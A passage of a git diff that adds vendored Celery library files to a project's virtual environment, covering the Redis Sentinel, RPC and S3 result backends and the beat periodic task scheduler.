self._unpack_chord_result + with client.pipeline() as pipe: + if self._chord_zset: + pipeline = pipe.zrange(jkey, 0, -1) + else: + pipeline = pipe.lrange(jkey, 0, total) + resl, = pipeline.execute() + resl = [unpack(tup, decode) for tup in resl] + try: + callback.delay(resl) + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Chord callback for %r raised: %r', request.group, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Callback error: {exc!r}'), + ) + finally: + with client.pipeline() as pipe: + pipe \ + .delete(jkey) \ + .delete(tkey) \ + .delete(skey) \ + .execute() + except ChordError as exc: + logger.exception('Chord %r raised: %r', request.group, exc) + return self.chord_error_from_stack(callback, exc) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', request.group, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Join error: {exc!r}'), + ) + + def _create_client(self, **params): + return self._get_client()( + connection_pool=self._get_pool(**params), + ) + + def _get_client(self): + return self.redis.StrictRedis + + def _get_pool(self, **params): + return self.ConnectionPool(**params) + + @property + def ConnectionPool(self): + if self._ConnectionPool is None: + self._ConnectionPool = self.redis.ConnectionPool + return self._ConnectionPool + + @cached_property + def client(self): + return self._create_client(**self.connparams) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__( + args, dict(kwargs, expires=self.expires, url=self.url)) + + +if getattr(redis, "sentinel", None): + class SentinelManagedSSLConnection( + redis.sentinel.SentinelManagedConnection, + redis.SSLConnection): + """Connect to a Redis server using Sentinel + TLS. + + Use Sentinel to identify which Redis server is the current master + to connect to and when connecting to the Master server, use an + SSL Connection. + """ + + +class SentinelBackend(RedisBackend): + """Redis sentinel task result store.""" + + # URL looks like `sentinel://0.0.0.0:26347/3;sentinel://0.0.0.0:26348/3` + _SERVER_URI_SEPARATOR = ";" + + sentinel = getattr(redis, "sentinel", None) + connection_class_ssl = SentinelManagedSSLConnection if sentinel else None + + def __init__(self, *args, **kwargs): + if self.sentinel is None: + raise ImproperlyConfigured(E_REDIS_SENTINEL_MISSING.strip()) + + super().__init__(*args, **kwargs) + + def as_uri(self, include_password=False): + """Return the server addresses as URIs, sanitizing the password or not.""" + # Allow superclass to do work if we don't need to force sanitization + if include_password: + return super().as_uri( + include_password=include_password, + ) + # Otherwise we need to ensure that all components get sanitized rather + # by passing them one by one to the `kombu` helper + uri_chunks = ( + maybe_sanitize_url(chunk) + for chunk in (self.url or "").split(self._SERVER_URI_SEPARATOR) + ) + # Similar to the superclass, strip the trailing slash from URIs with + # all components empty other than the scheme + return self._SERVER_URI_SEPARATOR.join( + uri[:-1] if uri.endswith(":///") else uri + for uri in uri_chunks + ) + + def _params_from_url(self, url, defaults): + chunks = url.split(self._SERVER_URI_SEPARATOR) + connparams = dict(defaults, hosts=[]) + for chunk in chunks: + data = super()._params_from_url( + url=chunk, defaults=defaults) + connparams['hosts'].append(data) + for param in ("host", "port", "db", "password"): + connparams.pop(param) + + # Adding db/password in connparams to connect to the correct instance + for param in ("db", "password"): + if connparams['hosts'] and param in connparams['hosts'][0]: + connparams[param] = connparams['hosts'][0].get(param) + return connparams + + def _get_sentinel_instance(self, **params): + connparams = params.copy() + + hosts = connparams.pop("hosts") + min_other_sentinels = self._transport_options.get("min_other_sentinels", 0) + sentinel_kwargs = self._transport_options.get("sentinel_kwargs", {}) + + sentinel_instance = self.sentinel.Sentinel( + [(cp['host'], cp['port']) for cp in hosts], + min_other_sentinels=min_other_sentinels, + sentinel_kwargs=sentinel_kwargs, + **connparams) + + return sentinel_instance + + def _get_pool(self, **params): + sentinel_instance = self._get_sentinel_instance(**params) + + master_name = self._transport_options.get("master_name", None) + + return sentinel_instance.master_for( + service_name=master_name, + redis_class=self._get_client(), + ).connection_pool diff --git a/env/Lib/site-packages/celery/backends/rpc.py b/env/Lib/site-packages/celery/backends/rpc.py new file mode 100644 index 00000000..399c1dc7 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/rpc.py @@ -0,0 +1,342 @@ +"""The ``RPC`` result backend for AMQP brokers. + +RPC-style result backend, using reply-to and one queue per client. +""" +import time + +import kombu +from kombu.common import maybe_declare +from kombu.utils.compat import register_after_fork +from kombu.utils.objects import cached_property + +from celery import states +from celery._state import current_task, task_join_will_block + +from . import base +from .asynchronous import AsyncBackendMixin, BaseResultConsumer + +__all__ = ('BacklogLimitExceeded', 'RPCBackend') + +E_NO_CHORD_SUPPORT = """ +The "rpc" result backend does not support chords! + +Note that a group chained with a task is also upgraded to be a chord, +as this pattern requires synchronization. + +Result backends that supports chords: Redis, Database, Memcached, and more. +""" + + +class BacklogLimitExceeded(Exception): + """Too much state history to fast-forward.""" + + +def _on_after_fork_cleanup_backend(backend): + backend._after_fork() + + +class ResultConsumer(BaseResultConsumer): + Consumer = kombu.Consumer + + _connection = None + _consumer = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._create_binding = self.backend._create_binding + + def start(self, initial_task_id, no_ack=True, **kwargs): + self._connection = self.app.connection() + initial_queue = self._create_binding(initial_task_id) + self._consumer = self.Consumer( + self._connection.default_channel, [initial_queue], + callbacks=[self.on_state_change], no_ack=no_ack, + accept=self.accept) + self._consumer.consume() + + def drain_events(self, timeout=None): + if self._connection: + return self._connection.drain_events(timeout=timeout) + elif timeout: + time.sleep(timeout) + + def stop(self): + try: + self._consumer.cancel() + finally: + self._connection.close() + + def on_after_fork(self): + self._consumer = None + if self._connection is not None: + self._connection.collect() + self._connection = None + + def consume_from(self, task_id): + if self._consumer is None: + return self.start(task_id) + queue = self._create_binding(task_id) + if not self._consumer.consuming_from(queue): + self._consumer.add_queue(queue) + self._consumer.consume() + + def cancel_for(self, task_id): + if self._consumer: + self._consumer.cancel_by_queue(self._create_binding(task_id).name) + + +class RPCBackend(base.Backend, AsyncBackendMixin): + """Base class for the RPC result backend.""" + + Exchange = kombu.Exchange + Producer = kombu.Producer + ResultConsumer = ResultConsumer + + #: Exception raised when there are too many messages for a task id. + BacklogLimitExceeded = BacklogLimitExceeded + + persistent = False + supports_autoexpire = True + supports_native_join = True + + retry_policy = { + 'max_retries': 20, + 'interval_start': 0, + 'interval_step': 1, + 'interval_max': 1, + } + + class Consumer(kombu.Consumer): + """Consumer that requires manual declaration of queues.""" + + auto_declare = False + + class Queue(kombu.Queue): + """Queue that never caches declaration.""" + + can_cache_declaration = False + + def __init__(self, app, connection=None, exchange=None, exchange_type=None, + persistent=None, serializer=None, auto_delete=True, **kwargs): + super().__init__(app, **kwargs) + conf = self.app.conf + self._connection = connection + self._out_of_band = {} + self.persistent = self.prepare_persistent(persistent) + self.delivery_mode = 2 if self.persistent else 1 + exchange = exchange or conf.result_exchange + exchange_type = exchange_type or conf.result_exchange_type + self.exchange = self._create_exchange( + exchange, exchange_type, self.delivery_mode, + ) + self.serializer = serializer or conf.result_serializer + self.auto_delete = auto_delete + self.result_consumer = self.ResultConsumer( + self, self.app, self.accept, + self._pending_results, self._pending_messages, + ) + if register_after_fork is not None: + register_after_fork(self, _on_after_fork_cleanup_backend) + + def _after_fork(self): + # clear state for child processes. + self._pending_results.clear() + self.result_consumer._after_fork() + + def _create_exchange(self, name, type='direct', delivery_mode=2): + # uses direct to queue routing (anon exchange). + return self.Exchange(None) + + def _create_binding(self, task_id): + """Create new binding for task with id.""" + # RPC backend caches the binding, as one queue is used for all tasks. + return self.binding + + def ensure_chords_allowed(self): + raise NotImplementedError(E_NO_CHORD_SUPPORT.strip()) + + def on_task_call(self, producer, task_id): + # Called every time a task is sent when using this backend. + # We declare the queue we receive replies on in advance of sending + # the message, but we skip this if running in the prefork pool + # (task_join_will_block), as we know the queue is already declared. + if not task_join_will_block(): + maybe_declare(self.binding(producer.channel), retry=True) + + def destination_for(self, task_id, request): + """Get the destination for result by task id. + + Returns: + Tuple[str, str]: tuple of ``(reply_to, correlation_id)``. + """ + # Backends didn't always receive the `request`, so we must still + # support old code that relies on current_task. + try: + request = request or current_task.request + except AttributeError: + raise RuntimeError( + f'RPC backend missing task request for {task_id!r}') + return request.reply_to, request.correlation_id or task_id + + def on_reply_declare(self, task_id): + # Return value here is used as the `declare=` argument + # for Producer.publish. + # By default we don't have to declare anything when sending a result. + pass + + def on_result_fulfilled(self, result): + # This usually cancels the queue after the result is received, + # but we don't have to cancel since we have one queue per process. + pass + + def as_uri(self, include_password=True): + return 'rpc://' + + def store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Send task return value and state.""" + routing_key, correlation_id = self.destination_for(task_id, request) + if not routing_key: + return + with self.app.amqp.producer_pool.acquire(block=True) as producer: + producer.publish( + self._to_result(task_id, state, result, traceback, request), + exchange=self.exchange, + routing_key=routing_key, + correlation_id=correlation_id, + serializer=self.serializer, + retry=True, retry_policy=self.retry_policy, + declare=self.on_reply_declare(task_id), + delivery_mode=self.delivery_mode, + ) + return result + + def _to_result(self, task_id, state, result, traceback, request): + return { + 'task_id': task_id, + 'status': state, + 'result': self.encode_result(result, state), + 'traceback': traceback, + 'children': self.current_task_children(request), + } + + def on_out_of_band_result(self, task_id, message): + # Callback called when a reply for a task is received, + # but we have no idea what do do with it. + # Since the result is not pending, we put it in a separate + # buffer: probably it will become pending later. + if self.result_consumer: + self.result_consumer.on_out_of_band_result(message) + self._out_of_band[task_id] = message + + def get_task_meta(self, task_id, backlog_limit=1000): + buffered = self._out_of_band.pop(task_id, None) + if buffered: + return self._set_cache_by_message(task_id, buffered) + + # Polling and using basic_get + latest_by_id = {} + prev = None + for acc in self._slurp_from_queue(task_id, self.accept, backlog_limit): + tid = self._get_message_task_id(acc) + prev, latest_by_id[tid] = latest_by_id.get(tid), acc + if prev: + # backends aren't expected to keep history, + # so we delete everything except the most recent state. + prev.ack() + prev = None + + latest = latest_by_id.pop(task_id, None) + for tid, msg in latest_by_id.items(): + self.on_out_of_band_result(tid, msg) + + if latest: + latest.requeue() + return self._set_cache_by_message(task_id, latest) + else: + # no new state, use previous + try: + return self._cache[task_id] + except KeyError: + # result probably pending. + return {'status': states.PENDING, 'result': None} + poll = get_task_meta # XXX compat + + def _set_cache_by_message(self, task_id, message): + payload = self._cache[task_id] = self.meta_from_decoded( + message.payload) + return payload + + def _slurp_from_queue(self, task_id, accept, + limit=1000, no_ack=False): + with self.app.pool.acquire_channel(block=True) as (_, channel): + binding = self._create_binding(task_id)(channel) + binding.declare() + + for _ in range(limit): + msg = binding.get(accept=accept, no_ack=no_ack) + if not msg: + break + yield msg + else: + raise self.BacklogLimitExceeded(task_id) + + def _get_message_task_id(self, message): + try: + # try property first so we don't have to deserialize + # the payload. + return message.properties['correlation_id'] + except (AttributeError, KeyError): + # message sent by old Celery version, need to deserialize. + return message.payload['task_id'] + + def revive(self, channel): + pass + + def reload_task_result(self, task_id): + raise NotImplementedError( + 'reload_task_result is not supported by this backend.') + + def reload_group_result(self, task_id): + """Reload group result, even if it has been previously fetched.""" + raise NotImplementedError( + 'reload_group_result is not supported by this backend.') + + def save_group(self, group_id, result): + raise NotImplementedError( + 'save_group is not supported by this backend.') + + def restore_group(self, group_id, cache=True): + raise NotImplementedError( + 'restore_group is not supported by this backend.') + + def delete_group(self, group_id): + raise NotImplementedError( + 'delete_group is not supported by this backend.') + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__(args, dict( + kwargs, + connection=self._connection, + exchange=self.exchange.name, + exchange_type=self.exchange.type, + persistent=self.persistent, + serializer=self.serializer, + auto_delete=self.auto_delete, + expires=self.expires, + )) + + @property + def binding(self): + return self.Queue( + self.oid, self.exchange, self.oid, + durable=False, + auto_delete=True, + expires=self.expires, + ) + + @cached_property + def oid(self): + # cached here is the app thread OID: name of queue we receive results on. + return self.app.thread_oid diff --git a/env/Lib/site-packages/celery/backends/s3.py b/env/Lib/site-packages/celery/backends/s3.py new file mode 100644 index 00000000..ea04ae37 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/s3.py @@ -0,0 +1,87 @@ +"""s3 result store backend.""" + +from kombu.utils.encoding import bytes_to_str + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import boto3 + import botocore +except ImportError: + boto3 = None + botocore = None + + +__all__ = ('S3Backend',) + + +class S3Backend(KeyValueStoreBackend): + """An S3 task result store. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`boto3` is not available, + if the :setting:`aws_access_key_id` or + setting:`aws_secret_access_key` are not set, + or it the :setting:`bucket` is not set. + """ + + def __init__(self, **kwargs): + super().__init__(**kwargs) + + if not boto3 or not botocore: + raise ImproperlyConfigured('You must install boto3' + 'to use s3 backend') + conf = self.app.conf + + self.endpoint_url = conf.get('s3_endpoint_url', None) + self.aws_region = conf.get('s3_region', None) + + self.aws_access_key_id = conf.get('s3_access_key_id', None) + self.aws_secret_access_key = conf.get('s3_secret_access_key', None) + + self.bucket_name = conf.get('s3_bucket', None) + if not self.bucket_name: + raise ImproperlyConfigured('Missing bucket name') + + self.base_path = conf.get('s3_base_path', None) + + self._s3_resource = self._connect_to_s3() + + def _get_s3_object(self, key): + key_bucket_path = self.base_path + key if self.base_path else key + return self._s3_resource.Object(self.bucket_name, key_bucket_path) + + def get(self, key): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + try: + s3_object.load() + data = s3_object.get()['Body'].read() + return data if self.content_encoding == 'binary' else data.decode('utf-8') + except botocore.exceptions.ClientError as error: + if error.response['Error']['Code'] == "404": + return None + raise error + + def set(self, key, value): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + s3_object.put(Body=value) + + def delete(self, key): + key = bytes_to_str(key) + s3_object = self._get_s3_object(key) + s3_object.delete() + + def _connect_to_s3(self): + session = boto3.Session( + aws_access_key_id=self.aws_access_key_id, + aws_secret_access_key=self.aws_secret_access_key, + region_name=self.aws_region + ) + if session.get_credentials() is None: + raise ImproperlyConfigured('Missing aws s3 creds') + return session.resource('s3', endpoint_url=self.endpoint_url) diff --git a/env/Lib/site-packages/celery/beat.py b/env/Lib/site-packages/celery/beat.py new file mode 100644 index 00000000..76e44721 --- /dev/null +++ b/env/Lib/site-packages/celery/beat.py @@ -0,0 +1,736 @@ +"""The periodic task scheduler.""" + +import copy +import errno +import heapq +import os +import shelve +import sys +import time +import traceback +from calendar import timegm +from collections import namedtuple +from functools import total_ordering +from threading import Event, Thread + +from billiard import ensure_multiprocessing +from billiard.common import reset_signals +from billiard.context import Process +from kombu.utils.functional import maybe_evaluate, reprcall +from kombu.utils.objects import cached_property + +from . import __version__, platforms, signals +from .exceptions import reraise +from .schedules import crontab, maybe_schedule +from .utils.functional import is_numeric_value +from .utils.imports import load_extension_class_names, symbol_by_name +from .utils.log import get_logger, iter_open_logger_fds +from .utils.time import humanize_seconds, maybe_make_aware + +__all__ = ( + 'SchedulingError', 'ScheduleEntry', 'Scheduler', + 'PersistentScheduler', 'Service', 'EmbeddedService', +) + +event_t = namedtuple('event_t', ('time', 'priority', 'entry')) + +logger = get_logger(__name__) +debug, info, error, warning = (logger.debug, logger.info, + logger.error, logger.warning) + +DEFAULT_MAX_INTERVAL = 300 # 5 minutes + + +class SchedulingError(Exception): + """An error occurred while scheduling a task.""" + + +class BeatLazyFunc: + """A lazy function declared in 'beat_schedule' and called before sending to worker. + + Example: + + beat_schedule = { + 'test-every-5-minutes': { + 'task': 'test', + 'schedule': 300, + 'kwargs': { + "current": BeatCallBack(datetime.datetime.now) + } + } + } + + """ + + def __init__(self, func, *args, **kwargs): + self._func = func + self._func_params = { + "args": args, + "kwargs": kwargs + } + + def __call__(self): + return self.delay() + + def delay(self): + return self._func(*self._func_params["args"], **self._func_params["kwargs"]) + + +@total_ordering +class ScheduleEntry: + """An entry in the scheduler. + + Arguments: + name (str): see :attr:`name`. + schedule (~celery.schedules.schedule): see :attr:`schedule`. + args (Tuple): see :attr:`args`. + kwargs (Dict): see :attr:`kwargs`. + options (Dict): see :attr:`options`. + last_run_at (~datetime.datetime): see :attr:`last_run_at`. + total_run_count (int): see :attr:`total_run_count`. + relative (bool): Is the time relative to when the server starts? + """ + + #: The task name + name = None + + #: The schedule (:class:`~celery.schedules.schedule`) + schedule = None + + #: Positional arguments to apply. + args = None + + #: Keyword arguments to apply. + kwargs = None + + #: Task execution options. + options = None + + #: The time and date of when this task was last scheduled. + last_run_at = None + + #: Total number of times this task has been scheduled. + total_run_count = 0 + + def __init__(self, name=None, task=None, last_run_at=None, + total_run_count=None, schedule=None, args=(), kwargs=None, + options=None, relative=False, app=None): + self.app = app + self.name = name + self.task = task + self.args = args + self.kwargs = kwargs if kwargs else {} + self.options = options if options else {} + self.schedule = maybe_schedule(schedule, relative, app=self.app) + self.last_run_at = last_run_at or self.default_now() + self.total_run_count = total_run_count or 0 + + def default_now(self): + return self.schedule.now() if self.schedule else self.app.now() + _default_now = default_now # compat + + def _next_instance(self, last_run_at=None): + """Return new instance, with date and count fields updated.""" + return self.__class__(**dict( + self, + last_run_at=last_run_at or self.default_now(), + total_run_count=self.total_run_count + 1, + )) + __next__ = next = _next_instance # for 2to3 + + def __reduce__(self): + return self.__class__, ( + self.name, self.task, self.last_run_at, self.total_run_count, + self.schedule, self.args, self.kwargs, self.options, + ) + + def update(self, other): + """Update values from another entry. + + Will only update "editable" fields: + ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. + """ + self.__dict__.update({ + 'task': other.task, 'schedule': other.schedule, + 'args': other.args, 'kwargs': other.kwargs, + 'options': other.options, + }) + + def is_due(self): + """See :meth:`~celery.schedules.schedule.is_due`.""" + return self.schedule.is_due(self.last_run_at) + + def __iter__(self): + return iter(vars(self).items()) + + def __repr__(self): + return '<{name}: {0.name} {call} {0.schedule}'.format( + self, + call=reprcall(self.task, self.args or (), self.kwargs or {}), + name=type(self).__name__, + ) + + def __lt__(self, other): + if isinstance(other, ScheduleEntry): + # How the object is ordered doesn't really matter, as + # in the scheduler heap, the order is decided by the + # preceding members of the tuple ``(time, priority, entry)``. + # + # If all that's left to order on is the entry then it can + # just as well be random. + return id(self) < id(other) + return NotImplemented + + def editable_fields_equal(self, other): + for attr in ('task', 'args', 'kwargs', 'options', 'schedule'): + if getattr(self, attr) != getattr(other, attr): + return False + return True + + def __eq__(self, other): + """Test schedule entries equality. + + Will only compare "editable" fields: + ``task``, ``schedule``, ``args``, ``kwargs``, ``options``. + """ + return self.editable_fields_equal(other) + + +def _evaluate_entry_args(entry_args): + if not entry_args: + return [] + return [ + v() if isinstance(v, BeatLazyFunc) else v + for v in entry_args + ] + + +def _evaluate_entry_kwargs(entry_kwargs): + if not entry_kwargs: + return {} + return { + k: v() if isinstance(v, BeatLazyFunc) else v + for k, v in entry_kwargs.items() + } + + +class Scheduler: + """Scheduler for periodic tasks. + + The :program:`celery beat` program may instantiate this class + multiple times for introspection purposes, but then with the + ``lazy`` argument set. It's important for subclasses to + be idempotent when this argument is set. + + Arguments: + schedule (~celery.schedules.schedule): see :attr:`schedule`. + max_interval (int): see :attr:`max_interval`. + lazy (bool): Don't set up the schedule. + """ + + Entry = ScheduleEntry + + #: The schedule dict/shelve. + schedule = None + + #: Maximum time to sleep between re-checking the schedule. + max_interval = DEFAULT_MAX_INTERVAL + + #: How often to sync the schedule (3 minutes by default) + sync_every = 3 * 60 + + #: How many tasks can be called before a sync is forced. + sync_every_tasks = None + + _last_sync = None + _tasks_since_sync = 0 + + logger = logger # compat + + def __init__(self, app, schedule=None, max_interval=None, + Producer=None, lazy=False, sync_every_tasks=None, **kwargs): + self.app = app + self.data = maybe_evaluate({} if schedule is None else schedule) + self.max_interval = (max_interval or + app.conf.beat_max_loop_interval or + self.max_interval) + self.Producer = Producer or app.amqp.Producer + self._heap = None + self.old_schedulers = None + self.sync_every_tasks = ( + app.conf.beat_sync_every if sync_every_tasks is None + else sync_every_tasks) + if not lazy: + self.setup_schedule() + + def install_default_entries(self, data): + entries = {} + if self.app.conf.result_expires and \ + not self.app.backend.supports_autoexpire: + if 'celery.backend_cleanup' not in data: + entries['celery.backend_cleanup'] = { + 'task': 'celery.backend_cleanup', + 'schedule': crontab('0', '4', '*'), + 'options': {'expires': 12 * 3600}} + self.update_from_dict(entries) + + def apply_entry(self, entry, producer=None): + info('Scheduler: Sending due task %s (%s)', entry.name, entry.task) + try: + result = self.apply_async(entry, producer=producer, advance=False) + except Exception as exc: # pylint: disable=broad-except + error('Message Error: %s\n%s', + exc, traceback.format_stack(), exc_info=True) + else: + if result and hasattr(result, 'id'): + debug('%s sent. id->%s', entry.task, result.id) + else: + debug('%s sent.', entry.task) + + def adjust(self, n, drift=-0.010): + if n and n > 0: + return n + drift + return n + + def is_due(self, entry): + return entry.is_due() + + def _when(self, entry, next_time_to_run, mktime=timegm): + """Return a utc timestamp, make sure heapq in correct order.""" + adjust = self.adjust + + as_now = maybe_make_aware(entry.default_now()) + + return (mktime(as_now.utctimetuple()) + + as_now.microsecond / 1e6 + + (adjust(next_time_to_run) or 0)) + + def populate_heap(self, event_t=event_t, heapify=heapq.heapify): + """Populate the heap with the data contained in the schedule.""" + priority = 5 + self._heap = [] + for entry in self.schedule.values(): + is_due, next_call_delay = entry.is_due() + self._heap.append(event_t( + self._when( + entry, + 0 if is_due else next_call_delay + ) or 0, + priority, entry + )) + heapify(self._heap) + + # pylint disable=redefined-outer-name + def tick(self, event_t=event_t, min=min, heappop=heapq.heappop, + heappush=heapq.heappush): + """Run a tick - one iteration of the scheduler. + + Executes one due task per call. + + Returns: + float: preferred delay in seconds for next call. + """ + adjust = self.adjust + max_interval = self.max_interval + + if (self._heap is None or + not self.schedules_equal(self.old_schedulers, self.schedule)): + self.old_schedulers = copy.copy(self.schedule) + self.populate_heap() + + H = self._heap + + if not H: + return max_interval + + event = H[0] + entry = event[2] + is_due, next_time_to_run = self.is_due(entry) + if is_due: + verify = heappop(H) + if verify is event: + next_entry = self.reserve(entry) + self.apply_entry(entry, producer=self.producer) + heappush(H, event_t(self._when(next_entry, next_time_to_run), + event[1], next_entry)) + return 0 + else: + heappush(H, verify) + return min(verify[0], max_interval) + adjusted_next_time_to_run = adjust(next_time_to_run) + return min(adjusted_next_time_to_run if is_numeric_value(adjusted_next_time_to_run) else max_interval, + max_interval) + + def schedules_equal(self, old_schedules, new_schedules): + if old_schedules is new_schedules is None: + return True + if old_schedules is None or new_schedules is None: + return False + if set(old_schedules.keys()) != set(new_schedules.keys()): + return False + for name, old_entry in old_schedules.items(): + new_entry = new_schedules.get(name) + if not new_entry: + return False + if new_entry != old_entry: + return False + return True + + def should_sync(self): + return ( + (not self._last_sync or + (time.monotonic() - self._last_sync) > self.sync_every) or + (self.sync_every_tasks and + self._tasks_since_sync >= self.sync_every_tasks) + ) + + def reserve(self, entry): + new_entry = self.schedule[entry.name] = next(entry) + return new_entry + + def apply_async(self, entry, producer=None, advance=True, **kwargs): + # Update time-stamps and run counts before we actually execute, + # so we have that done if an exception is raised (doesn't schedule + # forever.) + entry = self.reserve(entry) if advance else entry + task = self.app.tasks.get(entry.task) + + try: + entry_args = _evaluate_entry_args(entry.args) + entry_kwargs = _evaluate_entry_kwargs(entry.kwargs) + if task: + return task.apply_async(entry_args, entry_kwargs, + producer=producer, + **entry.options) + else: + return self.send_task(entry.task, entry_args, entry_kwargs, + producer=producer, + **entry.options) + except Exception as exc: # pylint: disable=broad-except + reraise(SchedulingError, SchedulingError( + "Couldn't apply scheduled task {0.name}: {exc}".format( + entry, exc=exc)), sys.exc_info()[2]) + finally: + self._tasks_since_sync += 1 + if self.should_sync(): + self._do_sync() + + def send_task(self, *args, **kwargs): + return self.app.send_task(*args, **kwargs) + + def setup_schedule(self): + self.install_default_entries(self.data) + self.merge_inplace(self.app.conf.beat_schedule) + + def _do_sync(self): + try: + debug('beat: Synchronizing schedule...') + self.sync() + finally: + self._last_sync = time.monotonic() + self._tasks_since_sync = 0 + + def sync(self): + pass + + def close(self): + self.sync() + + def add(self, **kwargs): + entry = self.Entry(app=self.app, **kwargs) + self.schedule[entry.name] = entry + return entry + + def _maybe_entry(self, name, entry): + if isinstance(entry, self.Entry): + entry.app = self.app + return entry + return self.Entry(**dict(entry, name=name, app=self.app)) + + def update_from_dict(self, dict_): + self.schedule.update({ + name: self._maybe_entry(name, entry) + for name, entry in dict_.items() + }) + + def merge_inplace(self, b): + schedule = self.schedule + A, B = set(schedule), set(b) + + # Remove items from disk not in the schedule anymore. + for key in A ^ B: + schedule.pop(key, None) + + # Update and add new items in the schedule + for key in B: + entry = self.Entry(**dict(b[key], name=key, app=self.app)) + if schedule.get(key): + schedule[key].update(entry) + else: + schedule[key] = entry + + def _ensure_connected(self): + # callback called for each retry while the connection + # can't be established. + def _error_handler(exc, interval): + error('beat: Connection error: %s. ' + 'Trying again in %s seconds...', exc, interval) + + return self.connection.ensure_connection( + _error_handler, self.app.conf.broker_connection_max_retries + ) + + def get_schedule(self): + return self.data + + def set_schedule(self, schedule): + self.data = schedule + schedule = property(get_schedule, set_schedule) + + @cached_property + def connection(self): + return self.app.connection_for_write() + + @cached_property + def producer(self): + return self.Producer(self._ensure_connected(), auto_declare=False) + + @property + def info(self): + return '' + + +class PersistentScheduler(Scheduler): + """Scheduler backed by :mod:`shelve` database.""" + + persistence = shelve + known_suffixes = ('', '.db', '.dat', '.bak', '.dir') + + _store = None + + def __init__(self, *args, **kwargs): + self.schedule_filename = kwargs.get('schedule_filename') + super().__init__(*args, **kwargs) + + def _remove_db(self): + for suffix in self.known_suffixes: + with platforms.ignore_errno(errno.ENOENT): + os.remove(self.schedule_filename + suffix) + + def _open_schedule(self): + return self.persistence.open(self.schedule_filename, writeback=True) + + def _destroy_open_corrupted_schedule(self, exc): + error('Removing corrupted schedule file %r: %r', + self.schedule_filename, exc, exc_info=True) + self._remove_db() + return self._open_schedule() + + def setup_schedule(self): + try: + self._store = self._open_schedule() + # In some cases there may be different errors from a storage + # backend for corrupted files. Example - DBPageNotFoundError + # exception from bsddb. In such case the file will be + # successfully opened but the error will be raised on first key + # retrieving. + self._store.keys() + except Exception as exc: # pylint: disable=broad-except + self._store = self._destroy_open_corrupted_schedule(exc) + + self._create_schedule() + + tz = self.app.conf.timezone + stored_tz = self._store.get('tz') + if stored_tz is not None and stored_tz != tz: + warning('Reset: Timezone changed from %r to %r', stored_tz, tz) + self._store.clear() # Timezone changed, reset db! + utc = self.app.conf.enable_utc + stored_utc = self._store.get('utc_enabled') + if stored_utc is not None and stored_utc != utc: + choices = {True: 'enabled', False: 'disabled'} + warning('Reset: UTC changed from %s to %s', + choices[stored_utc], choices[utc]) + self._store.clear() # UTC setting changed, reset db! + entries = self._store.setdefault('entries', {}) + self.merge_inplace(self.app.conf.beat_schedule) + self.install_default_entries(self.schedule) + self._store.update({ + '__version__': __version__, + 'tz': tz, + 'utc_enabled': utc, + }) + self.sync() + debug('Current schedule:\n' + '\n'.join( + repr(entry) for entry in entries.values())) + + def _create_schedule(self): + for _ in (1, 2): + try: + self._store['entries'] + except KeyError: + # new schedule db + try: + self._store['entries'] = {} + except KeyError as exc: + self._store = self._destroy_open_corrupted_schedule(exc) + continue + else: + if '__version__' not in self._store: + warning('DB Reset: Account for new __version__ field') + self._store.clear() # remove schedule at 2.2.2 upgrade. + elif 'tz' not in self._store: + warning('DB Reset: Account for new tz field') + self._store.clear() # remove schedule at 3.0.8 upgrade + elif 'utc_enabled' not in self._store: + warning('DB Reset: Account for new utc_enabled field') + self._store.clear() # remove schedule at 3.0.9 upgrade + break + + def get_schedule(self): + return self._store['entries'] + + def set_schedule(self, schedule): + self._store['entries'] = schedule + schedule = property(get_schedule, set_schedule) + + def sync(self): + if self._store is not None: + self._store.sync() + + def close(self): + self.sync() + self._store.close() + + @property + def info(self): + return f' . db -> {self.schedule_filename}' + + +class Service: + """Celery periodic task service.""" + + scheduler_cls = PersistentScheduler + + def __init__(self, app, max_interval=None, schedule_filename=None, + scheduler_cls=None): + self.app = app + self.max_interval = (max_interval or + app.conf.beat_max_loop_interval) + self.scheduler_cls = scheduler_cls or self.scheduler_cls + self.schedule_filename = ( + schedule_filename or app.conf.beat_schedule_filename) + + self._is_shutdown = Event() + self._is_stopped = Event() + + def __reduce__(self): + return self.__class__, (self.max_interval, self.schedule_filename, + self.scheduler_cls, self.app) + + def start(self, embedded_process=False): + info('beat: Starting...') + debug('beat: Ticking with max interval->%s', + humanize_seconds(self.scheduler.max_interval)) + + signals.beat_init.send(sender=self) + if embedded_process: + signals.beat_embedded_init.send(sender=self) + platforms.set_process_title('celery beat') + + try: + while not self._is_shutdown.is_set(): + interval = self.scheduler.tick() + if interval and interval > 0.0: + debug('beat: Waking up %s.', + humanize_seconds(interval, prefix='in ')) + time.sleep(interval) + if self.scheduler.should_sync(): + self.scheduler._do_sync() + except (KeyboardInterrupt, SystemExit): + self._is_shutdown.set() + finally: + self.sync() + + def sync(self): + self.scheduler.close() + self._is_stopped.set() + + def stop(self, wait=False): + info('beat: Shutting down...') + self._is_shutdown.set() + wait and self._is_stopped.wait() # block until shutdown done. + + def get_scheduler(self, lazy=False, + extension_namespace='celery.beat_schedulers'): + filename = self.schedule_filename + aliases = dict(load_extension_class_names(extension_namespace)) + return symbol_by_name(self.scheduler_cls, aliases=aliases)( + app=self.app, + schedule_filename=filename, + max_interval=self.max_interval, + lazy=lazy, + ) + + @cached_property + def scheduler(self): + return self.get_scheduler() + + +class _Threaded(Thread): + """Embedded task scheduler using threading.""" + + def __init__(self, app, **kwargs): + super().__init__() + self.app = app + self.service = Service(app, **kwargs) + self.daemon = True + self.name = 'Beat' + + def run(self): + self.app.set_current() + self.service.start() + + def stop(self): + self.service.stop(wait=True) + + +try: + ensure_multiprocessing() +except NotImplementedError: # pragma: no cover + _Process = None +else: + class _Process(Process): + + def __init__(self, app, **kwargs): + 